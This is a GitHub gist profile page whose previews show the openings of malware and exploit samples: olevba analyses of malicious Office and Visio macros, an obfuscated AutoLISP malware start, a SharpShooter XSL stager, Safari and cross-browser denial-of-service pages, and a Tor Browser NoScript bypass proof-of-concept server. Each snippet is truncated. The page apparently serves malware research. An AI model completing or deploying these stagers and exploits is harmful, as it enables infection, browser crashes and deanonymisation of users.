Skip to content

Instantly share code, notes, and snippets.

View seclib's full-sized avatar

Seclib seclib

25 followers · 4 following
View GitHub Profile
@seclib
seclib / MacOffice
Created September 30, 2018 09:54
VBA MacOffice threat
## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
===============================================================================
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
@seclib
seclib / 887e9eaa7f6883725b24
Created September 24, 2018 10:57
Pentest VBA VBS sample
## Sample Hash: 80610bb3a5be887e9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:M-S-HB-- 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
===============================================================================
FILE: 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
@seclib
seclib / vba.threat
Created September 24, 2018 10:45
vba.threat
##############################################################################
## 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-H--- 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
===============================================================================
FILE: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
Type: OLE
@seclib
seclib / visio.vba.malicious
Created September 23, 2018 14:18
Visio Test Malicious VBA
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:M-S-H--- 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
===============================================================================
FILE: 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: visio/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
@seclib
seclib / lisp_malware
Created September 23, 2018 14:02
LISP Malware
###################################################################
## 332ca1146b1478cc9ddda9be07815a48071b9e83081eb995f33379385d3258f2
(setq s::startup nil)
(setq *startup* (strcat (chr 40)
(chr 115)
(chr 101)
(chr 116)
(chr 113)
(chr 32)
@seclib
seclib / df4b56g78rt97n8978u97k889rg7fds45fv64dcx
Created September 21, 2018 06:39
XSL stager - Sharp shooter
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
<msxsl:script language="JScript" implements-prefix="sharp">
function shooter(nodelist) {
<![CDATA[
function setversion() {
@seclib
seclib / ccddef1beae0d1c7962b1783003
Created September 21, 2018 06:27
VBA XLS Threat
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
===============================================================================
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
@seclib
seclib / seclib_safary_dead.html
Created September 17, 2018 12:51
Safari DoS ☠️
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA
@seclib
seclib / torbb.py
Created September 11, 2018 16:47
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
@seclib
seclib / ubDoS.html
Created September 11, 2018 15:26
Universal Browser DoS
<title>Title / History</title>
<script>
if (navigator.userAgent.indexOf('Chrome') == -1 && navigator.userAgent.indexOf('Safari') > -1) {
if(!String.prototype.repeat){(function(){'use strict';
var defineProperty=(function(){try{var object={};
var $defineProperty=Object.defineProperty;
var result=$defineProperty(object,object,object)&&$defineProperty}catch(error){}return result}());
var repeat=function(count){if(this==null){throw TypeError()}
var string=String(this);